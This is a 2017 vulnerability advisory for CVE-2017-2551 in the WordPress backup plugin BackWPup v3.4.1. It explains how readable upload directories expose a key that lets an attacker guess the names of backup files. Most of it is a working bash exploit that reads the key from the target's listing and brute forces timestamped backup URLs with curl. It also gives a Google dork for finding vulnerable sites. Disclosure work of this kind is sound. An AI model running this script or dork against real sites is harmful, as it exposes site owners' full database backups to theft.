Advisory #: 201
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
CWE: CWE-552 Files or Directories Accessible to External Parties
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is available for that day. Filename format: backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s Default settings are: %d = Two digit day of the month, with leading zeros %m = Day of the month, with leading zeros %Y = Four digit representation for the year %H = Hour in 24-hour format, with leading zeros %i = Two digit representation of the minute %s = Two digit representation of the second https://wordpress.org/plugins/backwpup I have an exploit available if you're interested.
Export: JSON TEXT XML
Exploit Code:
  1. #!/bin/bash
  2. #Exploit for Wordpress Plugin BackWPup v3.4.1
  3. #Download https://wordpress.org/plugins/backwpup
  4. #CWE-552: Files or Directories Accessible to External Parties
  5. #CVE-ID: CVE-2017-2551
  6. #Google Dork: inurl:wp-content/uploads/backwpup
  7.  
  8.  
  9. #Add banner about vulnerability
  10.  
  11. KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
  12.  
  13. #Add error checking here
  14. echo "[+] Getting Unique Key $KEY"
  15. DIR="backwpup-$KEY-backups"
  16. echo "[+] Checking directory $DIR"
  17. WPATH="$DIR/backwpup_$KEY"
  18. echo "[+] Creating Path: $WPATH"
  19. #use date command here for the default date of current day
  20. MONTH=09
  21. DAY=07
  22. YEAR=2017
  23. Z=0
  24.  
  25. echo "[+] Scanning website for available backups:"
  26. for y in `seq -w 0 23`; do
  27.         for x in `seq -w 0 59`; do
  28.                  Y=`echo "scale=2;($Z/86000)*100"|bc`;
  29.                  echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
  30.         for z in `seq -w 0 59`; do
  31.                  Z=$(( $Z + 1 ));
  32.                  CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
  33.                  RESULT=`curl -s --head $CWPATH|grep 200`;
  34.                 if [ -n "$RESULT" ]; then
  35.                  echo ""
  36.                  echo "[+] Location $CWPATH Found";
  37.                  echo "[+] Received $RESULT";
  38.                  echo "Downloading......";
  39.                 # wget $CWPATH
  41.                 fi;
  42.         done
  43.         done
  44. done
  45. echo "Completed."
Screen Shots:
Notes: 
Google Dork: inurl:wp-content/uploads/backwpup